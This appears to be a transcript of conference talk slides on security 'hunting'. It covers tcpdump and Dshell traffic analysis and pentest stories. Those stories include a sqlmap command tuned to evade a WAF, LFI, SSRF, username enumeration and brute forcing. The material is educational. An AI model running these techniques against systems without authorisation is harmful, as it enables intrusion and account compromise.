  • 4. Andrew McNicol @PrimalSec • Security consultant • Co-Founder and one of the lead authors of Primal Security blog/podcast try: print ‘I enjoy writing error-free Python with Google and stackoverflow” except:pass • I spend my day abusing features in web applications - previous IR (pcap, malware) 4
  • 5. Quick Outline • Hunter/Gatherer • Defensive Use Cases: – Slicing and dicing pcap w/tcpdump + Dshell – Staying ahead of the game • Offensive Use Cases: – A pentest is not a scan – Pushing Past Walls – Abusing Contact Us/Feedback Features – Testing Remediation #ThinkDifferently • Making Your Own Tools - A quick look at Python 5
  • 6. We didn’t do it • We are not lawyers and/or giving you any legal advice. • We are not giving you permission or authorizing you in any way to do anything. • In fact don’t do anything ever... 6
  • 7. This talk • Too many people only leverage automated tool output to perform their job function • We plan to share some of our experience on going beyond automated tools. • Note: We do like automated tools – This is not a talk on bashing them! 7
  • 8. What is a Gatherer? • Someone who leverages automated tools: – Find vulnerabilities with scanners – Find interesting network traffic with an IDS 8
  • 9. What is a Hunter? • One who goes beyond automated tools to: – Find vulnerabilities missed by vulnerability scanners – Find evil in a sea of pcap – Writes their own tools 9
  • 10. Hunter Mindset • General Zod or John Wick mode #Focus #Confidence 10
  • 12. WARNING – PCAP Ahead 12
  • 13. Hunting with tcpdump • The ability to rip through pcap using tcpdump/Bash is a very useful skill • Profiling network activity can help you find what might be missed • We have a whole talk just on this topic: –www.primalsecurity.net/being-the-hunter- with-tcpdump 13
  • 14. Hunting with tcpdump Cont. • How do you deal with the output? – BPFs and Linux Utilities 14
  • 15. Hunting with tcpdump: Linux Utilities • grep / egrep - Powerful search utilities –Useful switches -i, -v • sort / uniq • awk - Awesome utility, lots of functionality - I use it to prints parts of a line –Useful switch -F 15
  • 16. Hunting with tcpdump: BPFs • Berkeley Packet Filter (BPFs) can filter for packets of interest: – host – net – port – src / dst – Boolean logic (and, or) – Protocol specific (tcp, udp, icmp, etc.) 16
  • 17. Useful Bash 1-liner for tcpdump • Useful 1 liner to read in multiple files at once with tcpdump: for i in `ls *.pcap`; do <tcpdump_comm>; done • This for loop can be useful for really any command you need to run through a loop 17
  • 18. Hunting with tcpdump: DNS • I see DNS as a treasure trove of information • You may find me getting dragon sickness over all the gold in DNS :) 18
  • 19. Hunting with tcpdump: DNS Cont. • Summarizing DNS with tcpdump/Bash: –for i in `ls *.pcap`; do tcpdump -ttttnnr $i udp and port 53; done | grep ‘ A? ‘ 19
  • 20. Hunting with tcpdump: DNS Cont. •Summarizing DNS with tcpdump/Bash: 20
  • 21. Hunting with tcpdump: DNS Cont. •Summarizing DNS with tcpdump/Bash: 21
  • 22. Hunting with tcpdump: DNS Cont. •Advanced DNS BPF: 22
  • 23. Hunting with tcpdump: DNS Cont. •Advanced DNS BPF: 23
  • 24. Hunting with tcpdump: Outbound Connections • Find the SYN every hour ☺ #NeedleInHaystack • Same approach as DNS, but we will focus on summarizing the dst IP in SYN packet 24
  • 25. Hunting with tcpdump: Outbound Connections Cont. • Quick BPF to key in on SYNs “tcp[13]=2” • Next we will use “awk” to grab just the dst IP 25
  • 26. Hunting with tcpdump: Outbound Connections Cont. • Now we can summarize the dst IP with “awk” and “sort/uniq” 26
  • 27. Hunting with tcpdump: Outbound Connections Cont. • Now to speed things up we can extract just the IP and then toss into a script to lookup network info (CIDR/Net Owner) 27
  • 28. Hunting with tcpdump: Outbound Connections Cont. • Now we can add in a bit of Python to lookup network info using Team Cymru’s Python whois module: 28
  • 29. Hunting with tcpdump: Outbound Connections Cont. •Advanced BPF Example: 29
  • 30. Hunting with Dshell • Dshell is a Python based network hunting tool • Takes stuff spread across several packets and puts relevant details on an evenly spaced line 30
  • 31. Hunting with Dshell Cont. • Dshell has several modules for hunting: – dns: matches up request/response – synrst: SYN followed by RST/ACK – netflow – web: parses HTTP request/response • Check out the blog post on SANS: – https://isc.sans.edu/diary/Another+Networ k+Forensic+Tool+for+the+Toolbox+- +Dshell/19277 31
  • 32. Be in the Know • As InfoSec professionals we all sit on a throne of vulnerability data and system versioning information that can ideally look overwhelming from a glance. • So adjust your approach to keep yourself alert… • Be the Continuous Monitoring Hunter and Gatherer for your firm through these techniques... 32
  • 33. Follow, Read, Apply, Repeat • Follow other info sec professionals via twitter for the latest news. • Read security blogs and rss feeds for information on the newest vulnerabilities/ exploits that are trending today. • Apply what you read and identify your firm's footprint if applicable (via vuln data or hunting with tools) or create a lab environment (VM) to test a recent exploit. • Repeat do this process again throughout the day when you can or have downtime. 33
  • 34. Some CM Examples • Any security professional can appreciate a heads up! - Knowing info on the next BIG SCARY VULN before management does…#Heartbleed #Shellshock #POODLE #GHOST • Even knowing something as simple as a software having an out of band patch, security bulletin or approaching EOL - (i.e Java SE v7 EOL by the end of this month April 2015) 34
  • 35. Spread Awareness • Sharing information and knowledge about threats as they emerge can not only help you, but more importantly your TEAM. • Reference blogs and the NIST NVD once a CVE is released to help track/ communicate amongst your team. 35
  • 37. Scans Ran Found Nothing…So Secure, Right? • Often the focus of an assessment is to run tools and get things “scanned”: – “Did you run your scans?” – “How many checks did it fail?” 37
  • 39. Pushing Past Walls •Hacking is all about massive amounts of failure and not giving up •The right mindset is critical to being successful 39
  • 41. Pushing Past Walls Cont. • Recent pentest we found a WordPress server •Could access login panel - So brute force is in! –Enumerate valid usernames via login error messages •Wpscan found some stuff to play with: –Avada Theme with Revslider –Paid Memberships Pro Path Traversal Vulnerability –Photo Gallery <= 1.2.7 - Unauthenticated SQL injection 41
  • 42. Pushing Past Walls: Attack Plans • Brute Force:Had a valid username - very slow ☹ • Paid Memberships Pro 1.7.14.2 Path Traversal: – Worked! Sweet LFI (Grabbed wp-config.php) – It was via a php readfile() so no code execution 42
  • 43. Pushing Past Walls: Attack Plans • Photo Gallery <= 1.2.7 - SQL injection • In lab: – Read up on the vulnerability – Replicated in lab – Tested it in lab environment and w00tw00t worked – On Assessment Server: – Needed to have a valid Gallery ID for the server – Attempted MSF module and failed ☹ – Dug through pcap, few requests in RSTs from the server…hmm potential WAF 43
  • 44. Pushing Past Walls: Attack Plans • Figured out how to replicate the finding on lab setup with sqlmap: • sqlmap -u “<target_URL>” -p “order_by” --random- agent --tamper=between --dbms=mysql --level=5 -- risk=3 – Sqlmap on the target site – Still blocked! – Added in “--delay=“ and figured out I needed a 4 second delay to not trigger the WAF 44
  • 45. So I am back to this again….. 45
  • 46. Pushing Past Walls: Attack Plans • Result? Took a long time, but (DB Enum, Table Enum, --dump wp_users): – Screen shot from lab setup: 46
  • 47. Pushing Past Walls • Was able to crack user hashes and authenticate to server and completely comprise the web app • Great win here, but lots of places I nearly stopped and had to push past to be successful • Much easier to give up 47
  • 48. Contact Us and Feedback Forms 48
  • 49. Example: SSRF open relay •Server Side Request Forgery (SSRF) vulnerabilities can make the web app your puppet: –Contact Us Forms –Feedback Forms –Forms to request external services: •tweets-grab.php 49
  • 50. Example: SSRF open relay Cont. • Another team gave this site a clean bill of health after a WebInspect scan + remediation • Automated tools weren’t really working too well (Automated tool said 30 days) • Started to manually test features with Burp as proxy and found SSRF open relay ☺ 50
  • 51. Example: SSRF open relay Cont. • Gave me the ability to send emails to anyone coming from anyone in the organization (#BeefHook) 51
  • 52. Example: Vulns in Unlinked Content • Sharepoint sites are guilty of this where you may see a default IIS page at when visiting the FQDN, but then after some Google Fu, Burps Engagement Tool, etc. • site:<FQDN> or inurl:<FQDN> then from there leverage additional search operators to discover interesting information file:<extension> (maybe a .bak or .old) or (-) <FQDN> (kinda like a grep -v) • You find a new source of unlinked directories and resources that now establish a whole new attack surface! 52
  • 53. Example: Vulns in Unlinked Content • Most automated tools will only evaluate linked content • Enumerating technology in use and making requests for default content – lots of wins (default admin panels, vulnerable resources, etc.) – Google searching “<technology> exploit” • Lots of vulns could be hanging out unlinked in the app 53
  • 54. Username Enumeration • Difference in login messages •Password reset feature? – Attempting to reset the web admin “Which admin username did you want to reset?” • Metadata in documents on site 54
  • 55. Username Enumeration Cont. • In our experience web applications commonly don’t have strong password complexity requirements – “password3” “p@ssword”….yes they still work • Enumerating usernames, combined with no lockout features, and some wordlists = account compromise: – Deploy code, emails, upload files, etc. 55
  • 56. OSINT Example • Found Admin video on Youtube • Found Admin’s Github, LinkedIn, Facebook • Found Admin’s email in README of source code • Validated username via “Forgot my username” feature • Found additional connections to admin who liked his post on facebook and worked for same organization: – Brute forced accounts and gained access to application •We have a whole talk on OSINT: www.primalsecurity.net/osint/ 56
  • 57. Scanner Takes Too Long • Not uncommon for an automated tool to say “Estimated time 34 days…” 57
  • 58. Automated Tool Crashes App • Not uncommon for an automated tool to tip over a server • Throw an automated tool at a sensitive web application... You might see something like this: 58
  • 59. Automated Tool Crashes App Cont. • Should still be noted in the report as a finding - The big boy internet scans applications •You should also be able to perform manual testing to ensure other vulnerabilities are enumerated 59
  • 60. Testing Remediation Example • fileupload.php (client-side mime type check) bypass it by changing the “Content-Type” 60
  • 61. Testing Remediation Example • Developer fixes with additional server side checks and names the file fileupload2.php • How would you go about testing this? 61
  • 62. Testing Remediation Example Cont. • I saw my input pass to “fileupload2.php” • I thought “Hmm, I wonder if fileupload.php is still accessible…” 62
  • 63. Making Your Own Tools 63
  • 64. Learning a Scripting Language • I find it a necessary part of my day to day • Learning a scripting language isn’t that hard • It’s like starting a friction fire 64
  • 65. Python • Python is my weapon of choice • This talk won't teach you how to write Python, but we plan to show some examples –We have a whole talk and tutorial on Python: •Talk: www.primalsecurity.net/introduction-to-python- for-security-professionals/ •Tutorial: www.primalsecurity.net/tutorials/python- tutorials/ • We suggest picking a small project and tackle it 65
  • 66. Python Resources • Courses: – SecurityTube’s Python Scripting Expert Course – Google has a free course on Python – Codecademy Python course • Books: – Violent Python by TJ O‘Connor – Gray Hat and Black Hat Python by Justin Seitz 66
  • 67. Python Modules • Python has a lot of built-in and 3rd party modules that can do the heavy lifting for you • OS command: • whois lookup: 67
  • 68. Python Web Scanner • During our assessments we find it very useful to make custom scripts to automate interaction with web applications • Making web requests in Python is a very practical use case 68
  • 69. Python Web Scanner Cont. • A basic web scanner example 69
  • 70. More Advanced Web Scanner •PrimalSec <!-- Web Testing Framework --> 70
  • 71. Python examples - ShellShock • In Corelan training at DerbyCon …..deprived of sleep and overdosed on red bull -> Enter ShellShock –Had to spin up a tool to check for ShellShock 71
  • 72. Python - ShellShock Cont. • Below is a quick Proof of Concept (PoC) for Shellshock 72
  • 73. Python - ShellShock Cont. •Example output - this illustrates how to automate a RCE to make it feel like a web shell 73
  • 74. Writing Scripts for Assessment Report • Writing a script to demonstrate a vulnerability or the report can help land the impact – LFI/RFI -> Shell – Automating an RCE / web shell capability – Automating a SSRF to show potential impact 74
  • 75. Useful Training • Offensive Security: OSCP/OSCE • eLearnSecurity • SANS • Vulnhub.com • We have a talk covering this in more depth: –www.primalsecurity.net/how-to-be-an-infosec-geek/ 75
  • 76. In Summary • We hope this talk inspired more people to: – Be a Hunter and Gatherer – Pick up a scripting language or Bash Kung Fu #StartTheFire • Hopefully you can go out tomorrow and find bad guys or vulnerabilities that may have been missed for days, months, or even years! 76
  • 77. Contact Us • Primal Security –Website: www.primalsecurity.net –Email: andrew@primalsecurity.net –Twitter: @PrimalSec, @b3armunch 77